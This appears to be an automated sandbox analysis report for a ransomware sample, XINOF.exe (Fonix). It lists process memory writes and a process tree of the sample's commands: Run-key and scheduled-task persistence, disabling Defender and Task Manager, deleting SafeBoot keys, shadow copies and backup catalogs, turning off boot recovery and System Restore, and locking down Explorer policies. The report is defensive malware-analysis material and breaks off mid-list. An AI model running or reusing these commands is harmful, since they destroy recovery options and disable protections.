PID 1492 wrote to memory of 1016	1492	XINOF.exe	25
PID 1492 wrote to memory of 1016	1492	XINOF.exe	25
PID 1016 wrote to memory of 388	1016	cmd.exe	26
PID 1016 wrote to memory of 388	1016	cmd.exe	26
PID 1016 wrote to memory of 388	1016	cmd.exe	26
PID 1492 wrote to memory of 112	1492	XINOF.exe	27
PID 1492 wrote to memory of 112	1492	XINOF.exe	27
PID 1492 wrote to memory of 112	1492	XINOF.exe	27
PID 112 wrote to memory of 736	112	cmd.exe	28
PID 112 wrote to memory of 736	112	cmd.exe	28
PID 112 wrote to memory of 736	112	cmd.exe	28
PID 1492 wrote to memory of 1112	1492	XINOF.exe	29
PID 1492 wrote to memory of 1112	1492	XINOF.exe	29
PID 1492 wrote to memory of 1112	1492	XINOF.exe	29
PID 1112 wrote to memory of 1036	1112	cmd.exe	30
PID 1112 wrote to memory of 1036	1112	cmd.exe	30
PID 1112 wrote to memory of 1036	1112	cmd.exe	30
PID 1492 wrote to memory of 1032	1492	XINOF.exe	31
PID 1492 wrote to memory of 1032	1492	XINOF.exe	31
PID 1492 wrote to memory of 1032	1492	XINOF.exe	31
PID 1032 wrote to memory of 1516	1032	cmd.exe	32
PID 1032 wrote to memory of 1516	1032	cmd.exe	32
PID 1032 wrote to memory of 1516	1032	cmd.exe	32
PID 1492 wrote to memory of 1508	1492	XINOF.exe	33
PID 1492 wrote to memory of 1508	1492	XINOF.exe	33
PID 1492 wrote to memory of 1508	1492	XINOF.exe	33
PID 1508 wrote to memory of 1676	1508	cmd.exe	34
PID 1508 wrote to memory of 1676	1508	cmd.exe	34
PID 1508 wrote to memory of 1676	1508	cmd.exe	34
PID 1492 wrote to memory of 1296	1492	XINOF.exe	35
PID 1492 wrote to memory of 1296	1492	XINOF.exe	35
PID 1492 wrote to memory of 1296	1492	XINOF.exe	35
PID 1296 wrote to memory of 1784	1296	cmd.exe	36
PID 1296 wrote to memory of 1784	1296	cmd.exe	36
PID 1296 wrote to memory of 1784	1296	cmd.exe	36
PID 1492 wrote to memory of 1768	1492	XINOF.exe	37
PID 1492 wrote to memory of 1768	1492	XINOF.exe	37
PID 1492 wrote to memory of 1768	1492	XINOF.exe	37
PID 1768 wrote to memory of 1764	1768	cmd.exe	38
PID 1768 wrote to memory of 1764	1768	cmd.exe	38
PID 1768 wrote to memory of 1764	1768	cmd.exe	38
PID 1492 wrote to memory of 1844	1492	XINOF.exe	39
PID 1492 wrote to memory of 1844	1492	XINOF.exe	39
PID 1492 wrote to memory of 1844	1492	XINOF.exe	39
PID 1844 wrote to memory of 1848	1844	cmd.exe	40
PID 1844 wrote to memory of 1848	1844	cmd.exe	40
PID 1844 wrote to memory of 1848	1844	cmd.exe	40
PID 1492 wrote to memory of 1884	1492	XINOF.exe	41
PID 1492 wrote to memory of 1884	1492	XINOF.exe	41
PID 1492 wrote to memory of 1884	1492	XINOF.exe	41
PID 1884 wrote to memory of 1376	1884	cmd.exe	42
PID 1884 wrote to memory of 1376	1884	cmd.exe	42
PID 1884 wrote to memory of 1376	1884	cmd.exe	42
PID 1492 wrote to memory of 1692	1492	XINOF.exe	43
PID 1492 wrote to memory of 1692	1492	XINOF.exe	43
PID 1492 wrote to memory of 1692	1492	XINOF.exe	43
PID 1692 wrote to memory of 1508	1692	cmd.exe	44
PID 1692 wrote to memory of 1508	1692	cmd.exe	44
PID 1692 wrote to memory of 1508	1692	cmd.exe	44
PID 1508 wrote to memory of 1384	1508	cmd.exe	46
PID 1508 wrote to memory of 1384	1508	cmd.exe	46
PID 1508 wrote to memory of 1384	1508	cmd.exe	46
PID 1492 wrote to memory of 1768	1492	XINOF.exe	47

C:\Users\Admin\AppData\Local\Temp\XINOF.exe
"C:\Users\Admin\AppData\Local\Temp\XINOF.exe"
1⤵
- Modifies extensions of user files
- Drops startup file
- Drops desktop.ini file(s)
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN fonix /TR %temp%/Fonix.exe /RU SYSTEM /RL HIGHEST /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1016
- - C:\Windows\system32\schtasks.exe
    schtasks /CREATE /SC ONLOGON /TN fonix /TR C:\Users\Admin\AppData\Local\Temp/Fonix.exe /RU SYSTEM /RL HIGHEST /F
    3⤵
    - Creates scheduled task(s)
    PID:388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:112
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
    3⤵
    - Adds Run key to start application
    PID:736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1112
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
    3⤵
    - Adds Run key to start application
    PID:1036
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1032
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
    3⤵
    - Adds Run key to start application
    PID:1516
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d %temp%Fonix.exe /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1508
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\ /v "PhoenixTechnology" /t REG_SZ /d C:\Users\Admin\AppData\Local\TempFonix.exe /f
    3⤵
    - Adds Run key to start application
    PID:1676
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1296
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
    3⤵
    PID:1784
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1768
- - C:\Windows\system32\reg.exe
    reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
    3⤵
    PID:1764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1844
- - C:\Windows\system32\reg.exe
    reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1848
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1884
- - C:\Windows\system32\reg.exe
    reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F
    3⤵
    PID:1376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\system32\cmd.exe
    cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1508
  - - C:\Windows\system32\icacls.exe
      icacls * /grant Everyone:(OI)(CI)F /T /C /Q
      4⤵
      Modifies file permissions
      PID:1384
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy Cpriv.key %appdata%\Cpriv.key
  2⤵
  PID:1768
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy Cpub.key %appdata%\Cpub.key
  2⤵
  PID:1856
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Copy SystemID C:\ProgramData\SystemID
  2⤵
  PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
  2⤵
  PID:1892
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\System /v AllowBlockingAppsAtShutdown /t REG_DWORD /d 1 /f
    3⤵
    PID:1908
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoClose /t REG_DWORD /d 1 /f
    3⤵
    PID:1920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
  2⤵
  PID:1864
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v StartMenuLogOff /t REG_DWORD /d 1 /f
    3⤵
    PID:1828
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c start cmd.exe /c vssadmin Delete Shadows /All /Quiet & wmic shadowcopy delete & bcdedit /set {default} boostatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet/
  2⤵
  PID:612
- - C:\Windows\system32\cmd.exe
    cmd.exe /c vssadmin Delete Shadows /All /Quiet
    3⤵
    PID:1472
  - - C:\Windows\system32\vssadmin.exe
      vssadmin Delete Shadows /All /Quiet
      4⤵
      Interacts with shadow copies
      PID:740
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic shadowcopy delete
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1620
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} boostatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1296
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled no
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:1776
- - C:\Windows\system32\wbadmin.exe
    wbadmin delete catalog -quiet/
    3⤵
    - Deletes backup catalog
    - Drops file in Windows directory
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label D: XINOF
  2⤵
  PID:1920
- - C:\Windows\system32\label.exe
    Label D: XINOF
    3⤵
    - Enumerates connected drives
    PID:1824
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label E: XINOF
  2⤵
  PID:1828
- - C:\Windows\system32\label.exe
    Label E: XINOF
    3⤵
    - Enumerates connected drives
    PID:680
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label F: XINOF
  2⤵
  PID:292
- - C:\Windows\system32\label.exe
    Label F: XINOF
    3⤵
    - Enumerates connected drives
    PID:844
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label G: XINOF
  2⤵
  PID:1504
- - C:\Windows\system32\label.exe
    Label G: XINOF
    3⤵
    - Enumerates connected drives
    PID:568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label H: XINOF
  2⤵
  PID:548
- - C:\Windows\system32\label.exe
    Label H: XINOF
    3⤵
    - Enumerates connected drives
    PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label I: XINOF
  2⤵
  PID:1456
- - C:\Windows\system32\label.exe
    Label I: XINOF
    3⤵
    - Enumerates connected drives
    PID:1792
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label J: XINOF
  2⤵
  PID:296
- - C:\Windows\system32\label.exe
    Label J: XINOF
    3⤵
    - Enumerates connected drives
    PID:1352
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label K: XINOF
  2⤵
  PID:820
- - C:\Windows\system32\label.exe
    Label K: XINOF
    3⤵
    - Enumerates connected drives
    PID:1732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label L: XINOF
  2⤵
  PID:1648
- - C:\Windows\system32\label.exe
    Label L: XINOF
    3⤵
    - Enumerates connected drives
    PID:1156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label M: XINOF
  2⤵
  PID:1632
- - C:\Windows\system32\label.exe
    Label M: XINOF
    3⤵
    - Enumerates connected drives
    PID:1924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label N: XINOF
  2⤵
  PID:1796
- - C:\Windows\system32\label.exe
    Label N: XINOF
    3⤵
    - Enumerates connected drives
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label A: XINOF
  2⤵
  PID:924
- - C:\Windows\system32\label.exe
    Label A: XINOF
    3⤵
    - Enumerates connected drives
    PID:1276
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label B: XINOF
  2⤵
  PID:1600
- - C:\Windows\system32\label.exe
    Label B: XINOF
    3⤵
    - Enumerates connected drives
    PID:788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label O: XINOF
  2⤵
  PID:656
- - C:\Windows\system32\label.exe
    Label O: XINOF
    3⤵
    - Enumerates connected drives
    PID:1760
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label P: XINOF
  2⤵
  PID:1112
- - C:\Windows\system32\label.exe
    Label P: XINOF
    3⤵
    - Enumerates connected drives
    PID:1636
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label Q: XINOF
  2⤵
  PID:1508
- - C:\Windows\system32\label.exe
    Label Q: XINOF
    3⤵
    - Enumerates connected drives
    PID:1872
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label R: XINOF
  2⤵
  PID:1776
- - C:\Windows\system32\label.exe
    Label R: XINOF
    3⤵
    - Enumerates connected drives
    PID:1884
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label S: XINOF
  2⤵
  PID:1896
- - C:\Windows\system32\label.exe
    Label S: XINOF
    3⤵
    - Enumerates connected drives
    PID:1340
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label T: XINOF
  2⤵
  PID:1136
- - C:\Windows\system32\label.exe
    Label T: XINOF
    3⤵
    - Enumerates connected drives
    PID:576
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label U: XINOF
  2⤵
  PID:1820
- - C:\Windows\system32\label.exe
    Label U: XINOF
    3⤵
    - Enumerates connected drives
    PID:868
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label V: XINOF
  2⤵
  PID:1148
- - C:\Windows\system32\label.exe
    Label V: XINOF
    3⤵
    - Enumerates connected drives
    PID:1356
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label W: XINOF
  2⤵
  PID:1584
- - C:\Windows\system32\label.exe
    Label W: XINOF
    3⤵
    - Enumerates connected drives
    PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label X: XINOF
  2⤵
  PID:1408
- - C:\Windows\system32\label.exe
    Label X: XINOF
    3⤵
    - Enumerates connected drives
    PID:1248
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label Y: XINOF
  2⤵
  PID:1808
- - C:\Windows\system32\label.exe
    Label Y: XINOF
    3⤵
    - Enumerates connected drives
    PID:432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label Z: XINOF
  2⤵
  PID:1212
- - C:\Windows\system32\label.exe
    Label Z: XINOF
    3⤵
    - Enumerates connected drives
    PID:296
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c Label C: XINOF
  2⤵
  PID:108
- - C:\Windows\system32\label.exe
    Label C: XINOF
    3⤵
    PID:820
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1748
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoTrayContextMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:1332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
  2⤵
  PID:1060
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v DisableContextMenusInStart /t REG_DWORD /d 1 /f
    3⤵
    PID:1488
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:788
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchFilesInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:732
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:656
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:1788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:1136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:568
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMConfigurePrograms /t REG_DWORD /d 1 /f
    3⤵
    PID:808
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
  2⤵
  PID:1524
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyDocs /t REG_DWORD /d 1 /f
    3⤵
    PID:1672
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:1740
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
    3⤵
    PID:1032
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
  2⤵
  PID:1700
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSMMyPictures /t REG_DWORD /d 1 /f
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:916
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Explorer /v TaskbarNoPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1796
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
  2⤵
  PID:1844
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuPinnedList /t REG_DWORD /d 1 /f
    3⤵
    PID:1476
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
  2⤵
  PID:1384
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
    3⤵
    PID:1912
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
  2⤵
  PID:1776
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCANetwork /t REG_DWORD /d 1 /f
    3⤵
    PID:1376
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoUserNameInStartMenu /t REG_DWORD /d 1 /f
    3⤵
    PID:1896
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:576
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
    3⤵
    PID:1120
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
  2⤵
  PID:1340
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\RemovableStorageDevices /v Deny_All /t REG_DWORD /d 1 /f
    3⤵
    PID:1756
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
  2⤵
  PID:1684
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableChangePassword /t REG_DWORD /d 1 /f
    3⤵
    PID:1984
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
  2⤵
  PID:1108
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
    3⤵
    PID:1212
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:1468
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
    3⤵
    PID:1328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
  2⤵
  PID:1416
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoDispCPL /t REG_DWORD /d 1 /f
    3⤵
    PID:1432
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
  2⤵
  PID:432
- - C:\Windows\system32\reg.exe
    reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\NonEnum /v {645FF040-5081-101B-9F08-00AA002F954E} /t REG_DWORD /d 1 /f
    3⤵
    PID:1428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
  2⤵
  PID:1352
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\AppV\Client\Virtualization /v EnableDynamicVirtualization /t REG_DWORD /d 0 /f
    3⤵
    PID:1736
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
  2⤵
  PID:1744
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WinRE /v DisableSetup /t REG_DWORD /d 1 /f
    3⤵
    PID:1668
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
  2⤵
  PID:316
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableConfig /t REG_DWORD /d 1 /f
    3⤵
    PID:1448
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
  2⤵
  PID:1228
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows NT\SystemRestore /v DisableSR /t REG_DWORD /d 1 /f
    3⤵
    PID:1388
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
  2⤵
  PID:1700
- - C:\Windows\system32\reg.exe
    reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToDisk /t REG_DWORD /d 1 /f
    3⤵
    PID:1600
- C:\Windows\system32\cmd.exe
